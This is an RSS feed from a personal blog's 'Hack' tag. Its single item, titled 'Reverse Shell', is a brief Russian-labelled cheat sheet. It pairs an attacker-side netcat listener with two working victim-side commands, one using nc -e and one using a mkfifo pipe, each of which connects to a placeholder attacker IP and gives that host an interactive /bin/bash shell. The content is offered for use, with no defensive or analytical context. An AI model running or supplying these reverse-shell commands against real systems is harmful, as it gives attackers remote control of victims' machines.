<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hack on fruworg</title><link>https://fruw.supa.dog/tags/hack/</link><description>Recent content in Hack on fruworg</description><generator>Hugo -- gohugo.io</generator><language>ru-RU</language><lastBuildDate>Fri, 09 Dec 2022 15:02:00 +0500</lastBuildDate><atom:link href="https://fruw.supa.dog/tags/hack/index.xml" rel="self" type="application/rss+xml"/><item><title>Reverse Shell</title><link>https://fruw.supa.dog/posts/reverse-shell-nc/</link><pubDate>Fri, 09 Dec 2022 15:02:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/reverse-shell-nc/</guid><description>Машина атакующего nc -lvp &amp;lt;port&amp;gt; Машина жертвы (Traditional Netcat) nc &amp;lt;attacker-ip&amp;gt; &amp;lt;port&amp;gt; -e /bin/bash Машина жертвы (OpenBSD Netcat) mkfifo /tmp/rev; nc &amp;lt;attacker-ip&amp;gt; &amp;lt;port&amp;gt; &amp;lt; /tmp/rev | /bin/bash 2&amp;gt;&amp;amp;1 | tee /tmp/rev &amp;gt; /dev/null</description></item></channel></rss>